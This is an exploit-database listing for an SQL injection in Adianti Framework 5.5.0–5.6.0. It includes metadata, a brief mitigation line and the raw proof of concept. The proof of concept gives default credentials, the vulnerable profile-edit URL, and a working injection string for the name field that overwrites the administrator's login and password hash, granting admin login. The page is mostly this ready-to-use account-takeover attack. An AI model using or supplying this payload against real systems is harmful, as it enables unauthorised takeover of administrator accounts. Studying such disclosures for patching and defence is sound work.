header-logo
Suggest Exploit
vendor:
Adianti Framework
by:
Joner de Mello Assolin
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Adianti Framework
Affected Version From: 5.5.0
Affected Version To: 5.6.0
Patch Exists: NO
Related CWE: N/A
CPE: //a:adianti:adianti_framework
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1
2018

SQL Injection in Adianti Framework

The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, by editing the profile itself. The POC involves registering an ordinary user or using the framework standard, accessing the user profile and clicking edit, entering SQL injection in the field name and clicking save, and then going to the login screen and entering the username and password.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: [SQL Injection in Adianti Framework]
# Date: [2018-12-18]
# Exploit Author: [Joner de Mello Assolin]
# Vendor Homepage: [https://www.adianti.com.br]
# Version: [5.5.0 and 5.6.0] (REQUIRED)
# Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
# Software Link: [https://www.adianti.com.br/download-center?app=template]



The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, 
by editing the profile itself.



POC:

1-Register an ordinary user or use the framework standard(user=user password=user)

2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit

3- In the field name enter SQL injection and click Save:

(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#

4-Go to the login screen and enter username and password: Now you can log in as administrator!.

USER: anonymous

PASSWORD: anonymous